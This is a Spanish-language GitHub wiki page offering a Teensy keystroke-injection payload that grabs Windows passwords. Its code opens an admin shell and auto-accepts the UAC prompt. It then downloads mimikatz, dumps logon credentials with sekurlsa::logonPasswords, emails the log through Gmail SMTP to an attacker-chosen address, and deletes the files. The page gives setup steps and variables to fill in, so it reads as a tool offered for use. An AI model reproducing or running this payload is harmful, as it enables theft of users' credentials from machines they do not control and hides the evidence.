Payload [Mimikatz] Windows Passwords Grabber - H3LL0WORLD/Teensy-Plantilla-Base GitHub Wiki

¿Qué hace?

1. Descarga mimikatz.
2. Extrae contraseñas de inicio de sesión (Windows).
3. Envía log por correo.
4. Elimina log y mimikatz

Requisitos:

1. Cuenta de correo (gmail) para enviar el log con acceso a aplicaciones menos seguras activo.
2. Link de descarga directa de mimikatz x64 y x32 bits

Uso

1. Descargar plantilla base.
2. Poner el código entre la función payload al final de la plantilla.
3. Cambiar el valor de las variables: FROM, TO, PASS, x64, x32
4. Compilar y ejecutar.

Créditos

• Plantilla Base: H3LL0WORLD
• Payload original para USB Rubber Ducky por: redmeatuk.
• Mejoras y versión para Teensy H3LL0WORLD

// Desde donde se enviará el correo
// Debe tener activado el acceso a aplicaciones menos seguras: http://www.google.com/settings/security/lesssecureapps
#define FROM "[email protected]"

// Contraseña correo
#define PASS "pass123"

// Correo al cual se enviará la información.
#define TO "[email protected]"

// Links descarga directa mimikatz
//x64
String x64 = "ejemplo.com/mimikatz.exe";

//x32
String x32 = "ejemplo.com/mimikatz.exe";

// Delay promedio en milisegundos
int ds = 1000;

GUI(R);
delay(ds/2);

// CMD AS ADMIN
Escribir("powershell Start-Process cmd.exe -Verb runAs");
delay(ds*5);

// Aceptar cuadro de dialogo
ALT(S);
delay(ds*2);

enter();


//Descargar mimikatz dependiendo la arquitectura del OS

Escribir("CD %TMP%");
Escribir("For /F \"tokens=1\" %a in ('wmic OS get OSArchitecture ^| find \"bits\"') do (set OS=%a)");
delay(ds);
Escribir("if %OS%==64 (set link=\"" + x64 + "\") else (set link=\"" + x32 + "\")");
Escribir("powershell (new-object System.Net.WebClient).DownloadFile('%link%','mimikatz.exe')");
delay(ds);
Escribir("mimikatz.exe>Log.txt");
Escribir("privilege::debug");
Escribir("sekurlsa::logonPasswords full");
Escribir("exit");

//Enviar Log por correo
Escribir("powershell");
Escribir("$SMTPServer = 'smtp.gmail.com'");
Escribir("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)");
Escribir("$SMTPInfo.EnableSsl = $true");
Escribir("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('"FROM"', '"PASS"')");
Escribir("$ReportEmail = New-Object System.Net.Mail.MailMessage");
Escribir("$ReportEmail.From = '"FROM"'");
Escribir("$ReportEmail.To.Add('"TO"')");
Escribir("$ReportEmail.Subject = 'Windows Passwords Grabber'");
Escribir("$ReportEmail.Body = (Get-Content Log.txt | out-string)");
Escribir("$SMTPInfo.Send($ReportEmail)");
Escribir("exit");
Escribir("del /Q Log.txt & del  /Q mimikatz.exe");
Escribir("exit");